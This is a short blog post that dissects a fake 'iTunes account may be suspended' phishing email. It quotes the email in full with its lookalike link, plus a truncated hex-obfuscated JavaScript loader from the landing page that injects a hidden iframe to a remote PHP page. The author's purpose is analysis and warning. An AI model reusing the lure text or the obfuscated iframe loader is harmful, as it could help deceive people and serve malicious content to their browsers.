A friend just got hit with this:
From: iTunes Store
Date: 21 December 2010 05:30
Subject: iTunes account may be suspended.
Dear iTunes Customer,
it is possible that your account password has been stolen,
4 different IP addresses have been used to login to your account
within the last 24 hours. Please visit the bellow link and read
what to do and how to contact support department.
http://www.itunnes.net/itunes/howtocontact.html
iTunes will never ask you for your password or any confidential information.
If your iTunes account is no longer active then you may be a victim
of credit card fraud, please contact our support department following
the instructions at the above link in order to solve this issue.
Thank you,
iTunes Support Department
Aside from the evidently (but, alas, inadequately) bogus URL, when you click through to it you get to some code:
var i,y,x="3c696672616d65207372633d22687474703a2f2f7777772e776b6c65616b732e636f6d2f736d632f687a6871647a62332e70687022206e616d653d2266723122207363726f6c6c696e673d226e6f22206672616d65626f726465723d226e6f2220616c69676e3d2263656e746572223e3c2f696672616d653e0d0a";y='';for(i=0;i
...which deobfuscates the URL http://www.wkleaks.com/smc/hzhqdzb3.php and opens it in an IFRAME; the contents of that URL is currently blank, at least as far as wget and firefox are concerned.
To keep people interested, it also opens up http://support.apple.com/kb/HT1933 to give the user something to look at.
What do we reckon this is? XSS? Is the page at "wkleaks" meant to send a more interesting payload?
Leave a Reply